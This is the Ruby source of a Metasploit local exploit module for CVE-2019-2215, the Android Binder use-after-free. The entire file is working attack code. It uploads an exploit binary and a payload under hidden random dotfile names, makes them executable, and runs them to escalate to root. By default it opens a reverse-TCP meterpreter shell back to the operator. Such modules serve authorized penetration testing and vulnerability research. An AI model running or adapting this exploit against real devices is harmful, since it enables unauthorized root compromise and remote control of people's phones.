## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Common include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super( update_info( info, { 'Name' => "Android Binder Use-After-Free Exploit", 'Description' => %q{ }, 'License' => MSF_LICENSE, 'Author' => [ 'Jann Horn', # discovery and exploit 'Maddie Stone', # discovery and exploit 'grant-h', # Qu1ckR00t 'timwr', # metasploit module ], 'References' => [ [ 'CVE', '2019-2215' ], [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ], [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ], [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ], ], 'DisclosureDate' => "Sep 26 2019", 'SessionTypes' => [ 'meterpreter' ], 'Platform' => [ "android", "linux" ], 'Arch' => [ ARCH_AARCH64 ], 'Targets' => [[ 'Auto', {} ]], 'DefaultOptions' => { 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp', 'WfsDelay' => 5, }, 'DefaultTarget' => 0, } )) end def upload_and_chmodx(path, data) write_file path, data chmod(path) register_file_for_cleanup(path) end def exploit local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit" ) exploit_data = File.read(local_file, {:mode => 'rb'}) workingdir = session.fs.dir.getwd exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}" upload_and_chmodx(exploit_file, exploit_data) payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}" upload_and_chmodx(payload_file, generate_payload_exe) print_status("Executing exploit '#{exploit_file}'") result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}") print_status("Exploit result:\n#{result}") end end